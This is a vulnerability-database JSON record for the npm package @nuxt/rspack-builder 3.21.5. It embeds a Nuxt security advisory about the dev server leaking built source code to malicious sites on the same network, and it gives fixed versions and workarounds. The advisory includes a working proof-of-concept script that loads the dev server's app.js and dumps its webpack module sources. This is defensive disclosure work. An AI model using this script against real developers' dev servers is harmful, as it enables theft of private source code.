{"url":"http://public2.vulnerablecode.io/api/packages/515271?format=json","purl":"pkg:npm/%40nuxt/rspack-builder@3.21.5","type":"npm","namespace":"@nuxt","name":"rspack-builder","version":"3.21.5","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"3.21.6","latest_non_vulnerable_version":"4.4.6","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91957?format=json","vulnerability_id":"VCID-vkvp-zzq7-fucv","summary":"Nuxt: Dev server exposes built source over LAN to malicious sites (incomplete fix for GHSA-4gf7-ff8x-hq99)\n### Summary\nThis is an incomplete fix for [GHSA-4gf7-ff8x-hq99](https://github.com/nuxt/nuxt/security/advisories/GHSA-4gf7-ff8x-hq99). Source code may be stolen during dev when using the webpack / rspack builder if the dev server is bound to a non-loopback address (e.g. `nuxt dev --host`) and the developer opens a malicious site on the same network.\n\n### Details\nThe fix for [GHSA-4gf7-ff8x-hq99](https://github.com/nuxt/nuxt/security/advisories/GHSA-4gf7-ff8x-hq99) relied on the Sec-Fetch-Mode and Sec-Fetch-Site headers. Because [these headers are sent by browsers only for potentially trustworthy origins](https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-site-header:~:text=Site%20header%20for%20a%20request%20r%3A-,Assert%3A%20r%E2%80%99s%20url%20is%20a%20potentially%20trustworthy%20URL.,-Let%20header%20be%20a%20Structured%20Field%20whose), the check can be bypassed for non-potentially trustworthy origins.\n\nSince the attack requires the website to be accessible via a non-potentially trustworthy origin, only apps that are using `--host` are affected.\n\n### PoC\n1. Create a nuxt project with the webpack / rspack builder.\n1. Run `npm run dev`\n1. Open `http://localhost:3000`\n1. Run the script below in a web site that has a different origin.\n1. You can see the source code output in the document and the devtools console.\n\n```js\nconst script = document.createElement('script')\nscript.src = 'http://192.168.0.31:3000/_nuxt/app.js' // NOTE: replace with the IP address the dev server listens to\nscript.addEventListener('load', () => {\n  const key = Object.keys(window).find(k => k.startsWith(\"webpackChunk\"))\n  for (const page in window[key]) {\n    const moduleList = window[key][page][1]\n    console.log(moduleList)\n\n    for (const key in moduleList) {\n      const p = document.createElement('p')\n      const title = document.createElement('strong')\n      title.textContent = key\n      const code = document.createElement('code')\n      code.textContent = moduleList[key].toString()\n      p.append(title, ':', document.createElement('br'), code)\n      document.body.appendChild(p)\n    }\n  }\n})\ndocument.head.appendChild(script)\n```\n(This script is similar to the one in [GHSA-4gf7-ff8x-hq99](https://github.com/nuxt/nuxt/security/advisories/GHSA-4gf7-ff8x-hq99) except for the `script.src` and the global variable name)\n\n### Impact\nUsers of the webpack / rspack builder may have their source code stolen by malicious websites if the app uses a predictable host and is also run with `--host`.\n\nThis vulnerability does not affect Chrome 142+ (and other Chromium based browsers) users due to [the local network access restriction feature](https://developer.chrome.com/release-notes/142#local_network_access_restrictions).\n\n### Patches\nFixed in `nuxt@4.4.6` and `nuxt@3.21.6` by [#35051](https://github.com/nuxt/nuxt/pull/35051). The dev-middleware same-origin check now falls back to comparing the request's `Origin` / `Referer` host against `Host` when `Sec-Fetch-*` headers are absent, closing the non-trustworthy-origin bypass.\n\nThe fix only ships for the `@nuxt/webpack-builder` and `@nuxt/rspack-builder` packages. The default Vite builder was not affected.\n\n### Workarounds\nIf you cannot upgrade immediately:\n\n- Don't use `nuxt dev --host`. Bind the dev server to `localhost` (the default) and tunnel from other devices via SSH or a reverse proxy that enforces same-origin checks.\n- Use Chrome 142+ or another Chromium-based browser that enforces [local network access restrictions](https://developer.chrome.com/release-notes/142#local_network_access_restrictions).\n- Switch to the Vite builder for development.","references":[{"reference_url":"https://github.com/nuxt/nuxt","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nuxt/nuxt"},{"reference_url":"https://github.com/nuxt/nuxt/pull/35051","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nuxt/nuxt/pull/35051"},{"reference_url":"https://github.com/nuxt/nuxt/security/advisories/GHSA-6m52-m754-pw2g","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nuxt/nuxt/security/advisories/GHSA-6m52-m754-pw2g"},{"reference_url":"https://github.com/advisories/GHSA-6m52-m754-pw2g","reference_id":"GHSA-6m52-m754-pw2g","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6m52-m754-pw2g"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114470?format=json","purl":"pkg:npm/%40nuxt/rspack-builder@3.21.6","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/%2540nuxt/rspack-builder@3.21.6"},{"url":"http://public2.vulnerablecode.io/api/packages/114471?format=json","purl":"pkg:npm/%40nuxt/rspack-builder@4.4.6","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/%2540nuxt/rspack-builder@4.4.6"}],"aliases":["CVE-2026-45670","GHSA-6m52-m754-pw2g"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vkvp-zzq7-fucv"}],"fixing_vulnerabilities":[],"risk_score":"3.1","resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/%2540nuxt/rspack-builder@3.21.5"}